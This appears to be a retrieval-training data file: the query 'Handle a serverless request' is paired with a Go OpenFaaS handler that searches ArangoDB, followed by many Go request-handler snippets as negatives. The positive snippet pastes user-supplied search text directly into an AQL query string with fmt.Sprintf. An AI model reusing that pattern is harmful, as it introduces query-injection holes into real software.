query
stringlengths
7
3.85k
document
stringlengths
11
430k
metadata
dict
negatives
sequencelengths
0
101
negative_scores
sequencelengths
0
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Handle a serverless request
func Handle(w http.ResponseWriter, r *http.Request) { var err error var txtsearch string var ctx = context.Background() var query *SearchQuery var results []*models.User api.OPENFAASGetBody(r, &query) if goscrappy.Debug { fmt.Printf("Query : %+v\n", query) } var DB = dbservice.Db var qtemplate = ` FOR usr IN users LET a = ( FOR comp IN companies FILTER comp == usr.company RETURN comp ) LET b = ( FOR email IN emails FILTER email == usr.email RETURN email ) LET c = ( FOR phone IN phones FILTER phone == usr.phone RETURN phone ) %s LIMIT @offset, @limit RETURN merge(usr, { company: FIRST(a), email: FIRST(b), phone: FIRST(c) } ) ` if query != nil && query.Intext != nil { txtsearch = fmt.Sprintf( ` LET srch = LOWER("%s") LET inlastname = LOWER(usr.last_name) FILTER CONTAINS(inlastname, srch) `, *query.Intext, ) } limitVal := func() int64 { if query != nil && query.Count != nil && *query.Count > 0 { return *query.Count } return 10 }() offsetVal := func() int64 { if query != nil && query.Offset != nil && *query.Offset > 0 { return *query.Offset } return 0 }() q := fmt.Sprintf(qtemplate, txtsearch) cursor, err := DB.Query(ctx, q, map[string]interface{}{ "offset": offsetVal, "limit": limitVal, }) if err != nil { api.OPENFAASErrorResponse(w, http.StatusInternalServerError, err) return } defer cursor.Close() for { var doc models.User _, err := cursor.ReadDocument(ctx, &doc) if driver.IsNoMoreDocuments(err) { break } else if err != nil { api.OPENFAASErrorResponse(w, http.StatusInternalServerError, err) return } results = append(results, &doc) } api.OPENFAASJsonResponse(w, http.StatusOK, results) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (srv *server) handleRequest(clt *Client, msg *Message) {\n\treplyPayload, returnedErr := srv.impl.OnRequest(\n\t\tcontext.Background(),\n\t\tclt,\n\t\tmsg,\n\t)\n\tswitch returnedErr.(type) {\n\tcase nil:\n\t\tsrv.fulfillMsg(clt, msg, replyPayload)\n\tcase ReqErr:\n\t\tsrv.failMsg(clt, msg, returnedErr)\n\tcase *ReqErr:\n\t\tsrv.failMsg(clt, msg, returnedErr)\n\tdefault:\n\t\tsrv.errorLog.Printf(\"Internal error during request handling: %s\", returnedErr)\n\t\tsrv.failMsg(clt, msg, returnedErr)\n\t}\n}", "func handleRequest(function func() (interface{}, error), functionName string, w http.ResponseWriter, r *http.Request) {\n\tlog.Info(\">>>>> \" + functionName)\n\tdefer log.Info(\"<<<<< \" + functionName)\n\n\tvar chapiResp Response\n\tvars := mux.Vars(r)\n\tid := vars[\"id\"]\n\n\terr := validateHost(id)\n\tif err != nil {\n\t\thandleError(w, chapiResp, err, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tdata, err := function()\n\tif err != nil {\n\t\thandleError(w, chapiResp, err, http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tchapiResp.Data = data\n\tjson.NewEncoder(w).Encode(chapiResp)\n}", "func handleRequest(ctx context.Context, event events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\t// decode the event parameter\n\tvar data EventData\n\tif err := json.Unmarshal([]byte(event.Body), &data); err != nil {\n\t\treturn events.APIGatewayProxyResponse{StatusCode: 500}, err\n\t}\n\n\t// prepare the response string\n\tcurrentTime := time.Now()\n\tcurrentTimeStr := currentTime.Format(\"2006-01-02 15:04:05\")\n\tresponseStr := fmt.Sprintf(\"Hello from AWS Lambda, %s! Its %s\", data.Name, currentTimeStr)\n\n\t// return the response\n\treturn events.APIGatewayProxyResponse{Body: responseStr, StatusCode: 200}, nil\n}", "func handler(request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\t// Initiialize a connection to Sentry to capture errors and traces\n\tsentry.Init(sentry.ClientOptions{\n\t\tDsn: os.Getenv(\"SENTRY_DSN\"),\n\t\tTransport: &sentry.HTTPSyncTransport{\n\t\t\tTimeout: time.Second * 3,\n\t\t},\n\t\tServerName: os.Getenv(\"FUNCTION_NAME\"),\n\t\tRelease: os.Getenv(\"VERSION\"),\n\t\tEnvironment: os.Getenv(\"STAGE\"),\n\t})\n\n\t// Create headers if they don't exist and add\n\t// the CORS required headers, otherwise the response\n\t// will not be accepted by browsers.\n\theaders := request.Headers\n\tif headers == nil {\n\t\theaders = make(map[string]string)\n\t}\n\theaders[\"Access-Control-Allow-Origin\"] = \"*\"\n\n\t// Create the key attributes\n\tusr, err := acmeserverless.UnmarshalUser(request.Body)\n\tif err != nil {\n\t\treturn handleError(\"unmarshalling user\", headers, err)\n\t}\n\n\tdynamoStore := dynamodb.New()\n\tusr, err = dynamoStore.FindUser(usr.Username)\n\tif err != nil {\n\t\treturn handleError(\"getting users\", headers, err)\n\t}\n\n\taccessToken, refreshToken, err := GenerateTokenPair(usr.Username, usr.ID)\n\tif err != nil {\n\t\treturn handleError(\"generating accesstoken\", headers, err)\n\t}\n\n\tres := acmeserverless.LoginResponse{\n\t\tAccessToken: accessToken,\n\t\tRefreshToken: refreshToken,\n\t\tStatus: http.StatusOK,\n\t}\n\n\tpayload, err := res.Marshal()\n\tif err != nil {\n\t\treturn handleError(\"marshalling response\", headers, err)\n\t}\n\n\tresponse := events.APIGatewayProxyResponse{\n\t\tStatusCode: http.StatusOK,\n\t\tBody: string(payload),\n\t\tHeaders: headers,\n\t}\n\n\treturn response, nil\n}", "func HandleRequest(ctx context.Context) error {\n\tfmt.Println(\"Hello Go from Lambda!\")\n\treturn nil\n}", "func handleRequest(request *http.Request, t http.RoundTripper) (rsp *http.Response) {\n\tvar err error\n\n\tif rsp, err = t.RoundTrip(request); err != nil {\n\t\tlog.Println(\"Request failed:\", err)\n\t}\n\n\treturn\n}", "func (r *relay) handleRequest(reqId uint64, req []byte) {\n\trep := r.handler.HandleRequest(req)\n\tif err := r.sendReply(reqId, rep); err != nil {\n\t\tlog.Printf(\"iris: failed to send reply: %v.\", err)\n\t}\n}", "func handleRequest(ctx context.Context, request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\tvar err error\n\tvar resp interface{}\n\theaders := map[string]string{\n\t\t\"Access-Control-Allow-Headers\": \"Content-Type\",\n\t\t\"Access-Control-Allow-Origin\": \"*\",\n\t\t\"Access-Control-Allow-Methods\": \"GET\",\n\t}\n\n\tresp, err = getNovelList()\n\n\tif err != nil {\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tStatusCode: http.StatusInternalServerError,\n\t\t\tHeaders: headers,\n\t\t\tBody: err.Error(),\n\t\t}, err\n\t}\n\tformattedResp := formatResp(resp)\n\n\tresponse := events.APIGatewayProxyResponse{\n\t\tStatusCode: http.StatusOK,\n\t\tHeaders: headers,\n\t\tBody: formattedResp,\n\t}\n\treturn response, nil\n}", "func HandleRequest(ctx context.Context, evt MyEvent) (*MyResponse, error) {\n\t// context\n\tlc, _ := lambdacontext.FromContext(ctx)\n\tlog.Printf(\"AwsRequestID: %s\", lc.AwsRequestID)\n\n\t// environment variables\n\tfor _, e := range os.Environ() {\n\t\tlog.Println(e)\n\t}\n\n\tlog.Printf(\"Key1: %s\", evt.Key1)\n\tlog.Printf(\"Key2: %s\", evt.Key2)\n\tlog.Printf(\"Key3: %s\", evt.Key3)\n\n\tif evt.Key3 == \"\" {\n\t\treturn nil, errors.New(\"key3 is empty\")\n\t}\n\treturn &MyResponse{Message: evt.Key1}, nil\n}", "func (srv *Server) handleRequest(msg *Message) {\n\tsrv.opsLock.Lock()\n\t// Reject incoming requests during shutdown, return special shutdown error\n\tif srv.shutdown {\n\t\tsrv.opsLock.Unlock()\n\t\tmsg.failDueToShutdown()\n\t\treturn\n\t}\n\tsrv.currentOps++\n\tsrv.opsLock.Unlock()\n\n\treplyPayload, returnedErr := srv.hooks.OnRequest(\n\t\tcontext.WithValue(context.Background(), Msg, *msg),\n\t)\n\tswitch returnedErr.(type) {\n\tcase nil:\n\t\tmsg.fulfill(replyPayload)\n\tcase ReqErr:\n\t\tmsg.fail(returnedErr)\n\tcase *ReqErr:\n\t\tmsg.fail(returnedErr)\n\tdefault:\n\t\tsrv.errorLog.Printf(\"Internal error during request handling: %s\", returnedErr)\n\t\tmsg.fail(returnedErr)\n\t}\n\n\t// Mark request as done and shutdown the server if scheduled and no ops are left\n\tsrv.opsLock.Lock()\n\tsrv.currentOps--\n\tif srv.shutdown && srv.currentOps < 1 {\n\t\tclose(srv.shutdownRdy)\n\t}\n\tsrv.opsLock.Unlock()\n}", "func HandleRequest(req events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\n\tmsg := Message{}\n\tlog.Printf(\"req.Body = %v\\n\", req.Body)\n\tif err := json.Unmarshal([]byte(req.Body), &msg); err != nil {\n\t\tlog.Printf(\"Executing defaultmessage lambda function\\n\")\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tStatusCode: 500,\n\t\t\tBody: \"Error parsing message\",\n\t\t}, nil\n\t}\n\n\tlog.Printf(\"Successful execution of defaultmessage lambda function\\n\")\n\treturn events.APIGatewayProxyResponse{\n\t\t//Body: msg.Content + \" (echoed)\",\n\t\tBody: \"{\\\"status\\\": 200}\",\n\t\tStatusCode: 200,\n\t}, nil\n}", "func Handler(ctx context.Context) (Response, error) {\n\t_, span := tracer.Start(ctx, \"handler\")\n\tdefer span.End()\n\tvar buf bytes.Buffer\n\n\tbody, err := json.Marshal(map[string]interface{}{\n\t\t\"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n\t})\n\tif err != nil {\n\t\treturn Response{StatusCode: 404}, err\n\t}\n\tjson.HTMLEscape(&buf, body)\n\n\tresp := Response{\n\t\tStatusCode: 200,\n\t\tIsBase64Encoded: false,\n\t\tBody: buf.String(),\n\t\tHeaders: map[string]string{\n\t\t\t\"Content-Type\": \"application/json\",\n\t\t\t\"X-MyCompany-Func-Reply\": \"hello-handler\",\n\t\t},\n\t}\n\n\treturn resp, nil\n}", "func handleRequest(w http.ResponseWriter, r *http.Request) {\n\tswitch r.Method {\n\tcase \"GET\":\n\t\thandleGetRequest(w, r)\n\t\treturn\n\tcase \"POST\":\n\t\thandlePost(w, r)\n\t\treturn\n\tdefault:\n\t\tw.WriteHeader(http.StatusMethodNotAllowed)\n\t\tw.Write([]byte(\"HTTP methos not allowed.\"))\n\t\treturn\n\t}\n}", "func handleRequest(\n\tr *ssh.Request,\n\tsr func(\n\t\tname string,\n\t\twantReply bool,\n\t\tpayload []byte,\n\t) (bool, []byte, error),\n\tcl func() error,\n\tinfo string) {\n\t/* If this is the wrong sort of request, respond no */\n\tif s, ok := delayedReqs[r.Type]; ok {\n\t\tlog.Printf(\n\t\t\t\"%v Type:%v Delay:%v\",\n\t\t\tinfo,\n\t\t\tr.Type,\n\t\t\ts,\n\t\t)\n\t\ttime.Sleep(s)\n\t}\n\tlogRequest(r, info)\n\t/* Ask the other side */\n\tok, data, err := sr(r.Type, r.WantReply, r.Payload)\n\tif nil != err {\n\t\tlog.Printf(\n\t\t\t\"%v Unable to receive reply for %v request: %v\",\n\t\t\tinfo,\n\t\t\tr.Type,\n\t\t\terr,\n\t\t)\n\t\tcl()\n\t\treturn\n\t}\n\tlogRequestResponse(r, ok, data, info)\n\t/* Proxy back */\n\tif err := r.Reply(ok, nil); nil != err {\n\t\tlog.Printf(\n\t\t\t\"%v Unable to reply to %v request: %v\",\n\t\t\tinfo,\n\t\t\tr.Type,\n\t\t\terr,\n\t\t)\n\t\tcl()\n\t}\n}", "func HandleRequest(ctx context.Context, request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\t_, _ = pretty.Println(\"parsed:\", request.Body)\n\treturn events.APIGatewayProxyResponse{Body: \"response is working\", StatusCode: 200}, nil\n}", "func (s *Server) handleWhatever() {}", "func Handler(request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\n\n\tserver := os.Getenv(\"SERVER\")\n\n\t//Get the path parameter that was sent\n\tpath := request.Path\n\n\turl := \"http://\" + server + path\n\tresp, err := http.Get(url)\n if err != nil {\n\t\tlog.Fatalln(err)\n }\n\n\tbody, err := ioutil.ReadAll(resp.Body)\n\n if err != nil {\n\t\tlog.Fatalln(err)\n }\n\n\n\t//Generate message that want to be sent as body\n\t//message := fmt.Sprintf(\" { \\\"Message\\\" : \\\"Hello %s \\\" } \", url)\n\n\t//Returning response with AWS Lambda Proxy Response\n\treturn events.APIGatewayProxyResponse{Body: string(body), StatusCode: 200}, nil\n}", "func handler(request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\t// Initiialize a connection to Sentry to capture errors and traces\n\tsentry.Init(sentry.ClientOptions{\n\t\tDsn: os.Getenv(\"SENTRY_DSN\"),\n\t\tTransport: &sentry.HTTPSyncTransport{\n\t\t\tTimeout: time.Second * 3,\n\t\t},\n\t\tServerName: os.Getenv(\"FUNCTION_NAME\"),\n\t\tRelease: os.Getenv(\"VERSION\"),\n\t\tEnvironment: os.Getenv(\"STAGE\"),\n\t})\n\n\t// Create headers if they don't exist and add\n\t// the CORS required headers, otherwise the response\n\t// will not be accepted by browsers.\n\theaders := request.Headers\n\tif headers == nil {\n\t\theaders = make(map[string]string)\n\t}\n\theaders[\"Access-Control-Allow-Origin\"] = \"*\"\n\n\t// Update the order with an OrderID\n\tord, err := acmeserverless.UnmarshalOrder(request.Body)\n\tif err != nil {\n\t\treturn handleError(\"unmarshal\", headers, err)\n\t}\n\tord.OrderID = uuid.Must(uuid.NewV4()).String()\n\n\tdynamoStore := dynamodb.New()\n\tord, err = dynamoStore.AddOrder(ord)\n\tif err != nil {\n\t\treturn handleError(\"store\", headers, err)\n\t}\n\n\tprEvent := acmeserverless.PaymentRequestedEvent{\n\t\tMetadata: acmeserverless.Metadata{\n\t\t\tDomain: acmeserverless.OrderDomain,\n\t\t\tSource: \"AddOrder\",\n\t\t\tType: acmeserverless.PaymentRequestedEventName,\n\t\t\tStatus: acmeserverless.DefaultSuccessStatus,\n\t\t},\n\t\tData: acmeserverless.PaymentRequestDetails{\n\t\t\tOrderID: ord.OrderID,\n\t\t\tCard: ord.Card,\n\t\t\tTotal: ord.Total,\n\t\t},\n\t}\n\n\t// Send a breadcrumb to Sentry with the payment request\n\tsentry.AddBreadcrumb(&sentry.Breadcrumb{\n\t\tCategory: acmeserverless.PaymentRequestedEventName,\n\t\tTimestamp: time.Now(),\n\t\tLevel: sentry.LevelInfo,\n\t\tData: acmeserverless.ToSentryMap(prEvent.Data),\n\t})\n\n\tem := sqs.New()\n\terr = em.SendPaymentRequestedEvent(prEvent)\n\tif err != nil {\n\t\treturn handleError(\"request payment\", headers, err)\n\t}\n\n\tstatus := acmeserverless.OrderStatus{\n\t\tOrderID: ord.OrderID,\n\t\tUserID: ord.UserID,\n\t\tPayment: acmeserverless.CreditCardValidationDetails{\n\t\t\tMessage: \"pending payment\",\n\t\t\tSuccess: false,\n\t\t},\n\t}\n\n\t// Send a breadcrumb to Sentry with the shipment request\n\tsentry.AddBreadcrumb(&sentry.Breadcrumb{\n\t\tCategory: acmeserverless.PaymentRequestedEventName,\n\t\tTimestamp: time.Now(),\n\t\tLevel: sentry.LevelInfo,\n\t\tData: acmeserverless.ToSentryMap(status.Payment),\n\t})\n\n\tpayload, err := status.Marshal()\n\tif err != nil {\n\t\treturn handleError(\"response\", headers, err)\n\t}\n\n\tresponse := events.APIGatewayProxyResponse{\n\t\tStatusCode: http.StatusOK,\n\t\tBody: string(payload),\n\t\tHeaders: headers,\n\t}\n\n\treturn response, nil\n}", "func (srv *Server) handleRequest(msg *Message) {\n\treplyPayload, err := srv.hooks.OnRequest(\n\t\tcontext.WithValue(context.Background(), Msg, *msg),\n\t)\n\tif err != nil {\n\t\tmsg.fail(*err)\n\t\treturn\n\t}\n\tmsg.fulfill(replyPayload)\n}", "func handleRequest(payload Payload) (string, error) {\n action := payload.Action\n\tvar result = \"\"\n\tvar err error\n\n\tif action == \"create\" {\n\t\tresult, err = CreateToken(payload.UserID, payload.SecretName)\n\t\tif err != nil {\n\t\t\tlog.Println(\"Error: \" + err.Error())\n\t\t\treturn \"\", err\n\t\t}\n\t} else if action == \"verify\" {\n\t\tresult, err = VerifyToken(payload.TokenStr, payload.SecretName)\n\t\tif err != nil {\n\t\t\tlog.Println(\"Error: \" + err.Error())\n\t\t\treturn \"\", err\n\t\t}\n\t}\n\treturn result, err\n}", "func (c *Core) handleRequest(fctx *fasthttp.RequestCtx) {\n\tctx := c.assignCtx(fctx)\n\tdefer c.releaseCtx(ctx)\n\tif ctx.methodINT == -1 {\n\t\tctx.Status(StatusBadRequest).SendString(\"Invalid http method\")\n\t\treturn\n\t}\n\n\tstart := time.Now()\n\t// Delegate next to handle the request\n\t// Find match in stack\n\tmatch, err := c.next(ctx)\n\tif err != nil {\n\t\t_ = ctx.SendStatus(StatusInternalServerError)\n\t}\n\t// Generate ETag if enabled\n\tif match && c.ETag {\n\t\tsetETag(ctx, false)\n\t}\n\tif c.Debug {\n\t\td := time.Since(start)\n\t\t// d := time.Now().Sub(start).String()\n\t\tLog.D(\"%s %s %d %s\\n\", ctx.method, ctx.path, ctx.Response.StatusCode(), d)\n\t}\n}", "func handle(req typhon.Request, service, path string) typhon.Response {\n\turl := fmt.Sprintf(requestFormat, service, path)\n\n\tslog.Trace(req, \"Handling parsed URL: %v\", url)\n\n\tconn, err := net.Dial(\"tcp\", fmt.Sprintf(\"%s:80\", service))\n\tif err != nil {\n\t\tslog.Error(req, \"Unable to connect to %s: %v\", service, err)\n\t\treturn typhon.Response{Error: terrors.NotFound(\"service\", fmt.Sprintf(\"Unable to connect to %v\", service), nil)}\n\t}\n\tdefer conn.Close()\n\n\treq.Host = service\n\treq.URL.Scheme = \"http\"\n\treq.URL.Path = \"/\" + strings.TrimPrefix(path, \"/\")\n\treq.URL.Host = service\n\n\treturn req.Send().Response()\n}", "func (h *Handler) handleRequest(w http.ResponseWriter, r *http.Request) {\n\tmethod := r.Method\n\th.handleCommon(w, r, method)\n}", "func handler(ctx context.Context, req *events.Request) error {\n\t// Create the config.\n\tc := createConfig(ctx, req)\n\tc.log.Print(l.Input{\"loglevel\": \"info\", \"message\": \"Function started\"})\n\tdefer c.log.Print(l.Input{\"loglevel\": \"info\", \"message\": \"Function finished\"})\n\n\t// Create the Cognit service.\n\tif err := c.createCognitoService(); err != nil {\n\t\treturn c.runError(req, err)\n\t}\n\n\t// Unmarshal the ResourceProperties and OldResourceProperties into the config.\n\tif err := req.Unmarshal(c.resourceProperties, c.oldResourceProperties); err != nil {\n\t\treturn c.runError(req, err)\n\t}\n\n\t// Set physical ID - we need the generate secret as physical id,\n\t// since changing this needs replacement of the resource.\n\tc.physicalID = fmt.Sprintf(\"%s-%t-%s\", c.resourceProperties.UserPoolID, c.resourceProperties.GenerateSecret, c.resourceProperties.ClientName)\n\n\t// create, update or delete the userpool client.\n\tdata, err := c.run(req)\n\tif err != nil {\n\t\treturn c.runError(req, err)\n\t}\n\n\t// Send the result to the pre-signed s3 url.\n\tif err := req.Send(c.physicalID, data, err); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *Service) routeRequest(rsp http.ResponseWriter, req *Request, pln Pipeline) (interface{}, error) {\n s.router.ServeHTTP(rsp, req.Request)\n return nil, nil\n}", "func Handler(c *gin.Context) {\n\tvar req Request\n\tc.BindJSON(&req)\n\ts := service{\n\t\tcontext: c,\n\t\treq: req,\n\t}\n\tres, err := s.Execute()\n\tif err != nil {\n\t\tc.JSON(400, gin.H{\"error\": err.Error()})\n\t\treturn\n\t}\n\tc.JSON(200, gin.H{\"data\": res.Data})\n}", "func (s *Server) handleRequest(m *cloud.TokenRequest) (*cloud.TokenResponse, error) {\n\treq := request{m: m, ch: make(chan *response)}\n\tdefer close(req.ch)\n\ts.queue.queue <- req\n\tresp := <-req.ch\n\treturn resp.resp, resp.err\n}", "func (s *StubServer) HandleRequest(w http.ResponseWriter, r *http.Request) {\n\tstart := time.Now()\n\tfmt.Printf(\"Request: %v %v\\n\", r.Method, r.URL.Path)\n\n\t//\n\t// Validate headers\n\t//\n\n\tauth := r.Header.Get(\"Authorization\")\n\tif !validateAuth(auth) {\n\t\tmessage := fmt.Sprintf(invalidAuthorization, auth)\n\t\tstripeError := createStripeError(typeInvalidRequestError, message)\n\t\twriteResponse(w, r, start, http.StatusUnauthorized, stripeError)\n\t\treturn\n\t}\n\n\t// If the option `-strict-version-check` is on, any request that sends an\n\t// explicit `Stripe-Version` header must have a version that matches that\n\t// the one in the OpenAPI spec. This allows the user to optionally\n\t// strengthen expectations to protect against an unintended version drift.\n\tif s.strictVersionCheck {\n\t\tstripeVersion := r.Header.Get(\"Stripe-Version\")\n\t\tif stripeVersion != \"\" && stripeVersion != s.spec.Info.Version {\n\t\t\tmessage := fmt.Sprintf(invalidStripeVersion, stripeVersion, s.spec.Info.Version)\n\t\t\tstripeError := createStripeError(typeInvalidRequestError, message)\n\t\t\twriteResponse(w, r, start, http.StatusBadRequest, stripeError)\n\t\t\treturn\n\t\t}\n\t}\n\n\t//\n\t// Set headers\n\t//\n\n\t// We don't do anything with the idempotency key for now, but reflect it\n\t// back into response headers like the Stripe API does.\n\tidempotencyKey := r.Header.Get(\"Idempotency-Key\")\n\tif idempotencyKey != \"\" {\n\t\tw.Header().Set(\"Idempotency-Key\", idempotencyKey)\n\t}\n\n\t// Every response needs a Request-Id header except the invalid authorization\n\tw.Header().Set(\"Request-Id\", \"req_123\")\n\n\t//\n\t// Route request\n\t//\n\n\troute, pathParams, err := s.routeRequest(r)\n\tif err != nil {\n\t\tmessage := fmt.Sprintf(\"Couldn't parse path parameters: %v\", err)\n\t\tfmt.Printf(message + \"\\n\")\n\t\tstripeError := createStripeError(typeInvalidRequestError, message)\n\t\twriteResponse(w, r, start, http.StatusBadRequest, stripeError)\n\t\treturn\n\t}\n\n\tif route == nil {\n\t\tmessage := fmt.Sprintf(invalidRoute, r.Method, r.URL.Path)\n\t\tstripeError := createStripeError(typeInvalidRequestError, message)\n\t\twriteResponse(w, r, start, http.StatusNotFound, stripeError)\n\t\treturn\n\t}\n\n\tresponse, ok := route.operation.Responses[\"200\"]\n\tif !ok {\n\t\tfmt.Printf(\"Couldn't find 200 response in spec\\n\")\n\t\twriteResponse(w, r, start, http.StatusInternalServerError,\n\t\t\tcreateInternalServerError())\n\t\treturn\n\t}\n\n\tvar responseContent spec.MediaType\n\n\tif jsonResponseContent, ok := response.Content[\"application/json\"]; ok && jsonResponseContent.Schema != nil {\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tresponseContent = jsonResponseContent\n\t} else if pdfResponseContent, ok := response.Content[\"application/pdf\"]; ok && pdfResponseContent.Schema != nil {\n\t\tw.Header().Set(\"Content-Type\", \"application/pdf\")\n\t\tresponseContent = pdfResponseContent\n\t} else {\n\t\tfmt.Printf(\"Couldn't find application/json or application/pdf in response\\n\")\n\t\twriteResponse(w, r, start, http.StatusInternalServerError,\n\t\t\tcreateInternalServerError())\n\t\treturn\n\t}\n\n\tif s.verbose {\n\t\tfmt.Printf(\"IDs extracted from route: %+v\\n\", pathParams)\n\t\tfmt.Printf(\"Response schema: %s\\n\", responseContent.Schema)\n\t}\n\n\trequestData, err := param.ParseParams(r)\n\tif err != nil {\n\t\tmessage := fmt.Sprintf(\"Couldn't parse query/body: %v\", err)\n\t\tfmt.Printf(message + \"\\n\")\n\t\tstripeError := createStripeError(typeInvalidRequestError, message)\n\t\twriteResponse(w, r, start, http.StatusBadRequest, stripeError)\n\t\treturn\n\t}\n\n\tif s.verbose {\n\t\tif requestData != nil {\n\t\t\tfmt.Printf(\"Request data: %+v\\n\", requestData)\n\t\t} else {\n\t\t\tfmt.Printf(\"Request data: (none)\\n\")\n\t\t}\n\t}\n\n\t// Note that requestData is actually manipulated in place, but we show it\n\t// returned here to make it clear that this function will be manipulating\n\t// it.\n\trequestData, stripeError := validateAndCoerceRequest(r, route, requestData)\n\tif stripeError != nil {\n\t\twriteResponse(w, r, start, http.StatusBadRequest, stripeError)\n\t\treturn\n\t}\n\n\texpansions, rawExpansions := extractExpansions(requestData)\n\tif s.verbose {\n\t\tfmt.Printf(\"Expansions: %+v\\n\", rawExpansions)\n\t}\n\n\tgenerator := DataGenerator{s.spec.Components.Schemas, s.fixtures, s.verbose}\n\tresponseData, err := generator.Generate(&GenerateParams{\n\t\tExpansions: expansions,\n\t\tPathParams: pathParams,\n\t\tRequestData: requestData,\n\t\tRequestMethod: r.Method,\n\t\tRequestPath: r.URL.Path,\n\t\tSchema: responseContent.Schema,\n\t})\n\tif err != nil {\n\t\tfmt.Printf(\"Couldn't generate response: %v\\n\", err)\n\t\twriteResponse(w, r, start, http.StatusInternalServerError,\n\t\t\tcreateInternalServerError())\n\t\treturn\n\t}\n\tif s.verbose {\n\t\tresponseDataJSON, err := json.MarshalIndent(responseData, \"\", \" \")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tfmt.Printf(\"Response data: %s\\n\", responseDataJSON)\n\t}\n\twriteResponse(w, r, start, http.StatusOK, responseData)\n}", "func (s *Server) handleRequest(req *SocksRequest, conn net.Conn) error {\n\t// Switch on the command\n\tswitch req.Command {\n\tcase connectCommand:\n\t\treturn s.handleConnect(req)\n\tcase bindCommand:\n\t\treturn s.handleBind(req)\n\tcase associateCommand:\n\t\treturn s.handleAssociate(req)\n\tdefault:\n\t\tif err := sendReply(conn, commandNotSupported, nil); err != nil {\n\t\t\treturn fmt.Errorf(\"Failed to send reply: %v\", err)\n\t\t}\n\t\treturn fmt.Errorf(\"Unsupported command: %v\", req.Command)\n\t}\n}", "func (h *Handler) servePing(w http.ResponseWriter, r *http.Request) {}", "func (p *Server) handle(resp *http.Response) {\n\n\tdefer resp.Body.Close()\n\n\treqId := resp.Header.Get(\"Reqid\")\n\tif reqId == \"\" {\n\t\tlog.Warn(\"unidisvr: Reqid not found\")\n\t\treturn\n\t}\n\n\tb := bufio.NewReader(resp.Body)\n\treq, err := http.ReadRequest(b)\n\tif err != nil {\n\t\tlog.Warn(\"unidisvr: ReadRequest failed -\", p.Addr, p.BaseUrl, err)\n\t\treturn\n\t}\n\n\tw := newResponseWriter(p.BaseUrl, reqId)\n\tp.Handler.ServeHTTP(w, req)\n\terr = w.Done()\n\tif err != nil {\n\t\tlog.Warn(\"unidisvr: ServeHTTP failed -\", p.Addr, p.BaseUrl, err)\n\t}\n}", "func Handle(req gohttp.Request) (gohttp.Response, error) {\n\tvar err error\n\n\tlogrus.Info(\"Value of body: \", string(req.GetBody()))\n\n\tmessage := fmt.Sprintf(\"Body: %s\", string(req.GetBody()))\n\n\treturn gohttp.FunctionResponse{\n\t\tBody: []byte(message),\n\t\tStatusCode: http.StatusAccepted,\n\t\tHeader: http.Header{\"Content-Type\": []string{\"text/plain\"}}}, err\n}", "func HandleRequest(ctx context.Context, req events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\n\t// Slack sends its parameters as url encoded data in the request body. These need to be parsed to obtain the key/values. A list of the data slack sends can be seen [here](https://api.slack.com/interactivity/slash-commands).\n\n\t// Get slack params\n\tparams, err := url.ParseQuery(req.Body)\n\tif err != nil {\n\t\treturn internalError(fmt.Errorf(\"decoding slack params: %v\", err))\n\t}\n\ttext := params.Get(\"text\")\n\n\t// Do something. Anything you want really\n\t// Some cool code\n\n\t// Construct response data\n\tr := Response{\n\t\tType: \"in_channel\",\n\t\tText: fmt.Sprintf(\"You said '%s'\", text),\n\t}\n\n\tdata, err := json.Marshal(r)\n\tif err != nil {\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tStatusCode: 500,\n\t\t\tBody: err.Error(),\n\t\t}, nil\n\t}\n\n\treturn events.APIGatewayProxyResponse{\n\t\tStatusCode: 200,\n\t\tHeaders: map[string]string{\n\t\t\t\"Content-Type\": \"application/json\",\n\t\t},\n\t\tBody: string(data),\n\t}, nil\n}", "func (kvs *keyValueServer) handleRequest(req *Request) {\n\tvar request []string\n\trequest = kvs.parseRequest(req.input)\n\tif request[0] == \"get\" {\n\t\tclient := kvs.clienter[req.cid]\n\t\tkvs.getFromDB(request, client)\n\t}\n\tif request[0] == \"put\" {\n\t\tkvs.putIntoDB(request)\n\t}\n}", "func (q *eventQ) handleRequest(req *protocol.Request) (*protocol.Response, error) {\n\tvar resp *protocol.Response\n\tvar err error\n\tinternal.Debugf(q.conf, \"request: %s\", &req.Name)\n\n\tswitch req.Name {\n\tcase protocol.CmdBatch:\n\t\tresp, err = q.handleBatch(req)\n\t\tinstrumentRequest(stats.BatchRequests, stats.BatchErrors, err)\n\tcase protocol.CmdRead:\n\t\tresp, err = q.handleRead(req)\n\t\tinstrumentRequest(stats.ReadRequests, stats.ReadErrors, err)\n\tcase protocol.CmdTail:\n\t\tresp, err = q.handleTail(req)\n\t\tinstrumentRequest(stats.TailRequests, stats.TailErrors, err)\n\tcase protocol.CmdStats:\n\t\tresp, err = q.handleStats(req)\n\t\tinstrumentRequest(stats.StatsRequests, stats.StatsErrors, err)\n\tcase protocol.CmdClose:\n\t\tresp, err = q.handleClose(req)\n\t\tinstrumentRequest(stats.CloseRequests, stats.CloseErrors, err)\n\tcase protocol.CmdConfig:\n\t\tresp, err = q.handleConfig(req)\n\t\tinstrumentRequest(stats.ConfigRequests, stats.ConfigErrors, err)\n\tdefault:\n\t\tlog.Printf(\"unhandled request type passed: %v\", req.Name)\n\t\tresp = req.Response\n\t\tcr := req.Response.ClientResponse\n\t\tcr.SetError(protocol.ErrInvalid)\n\t\terr = protocol.ErrInvalid\n\t\tif _, werr := req.WriteResponse(resp, cr); werr != nil {\n\t\t\terr = werr\n\t\t}\n\t}\n\n\treturn resp, err\n}", 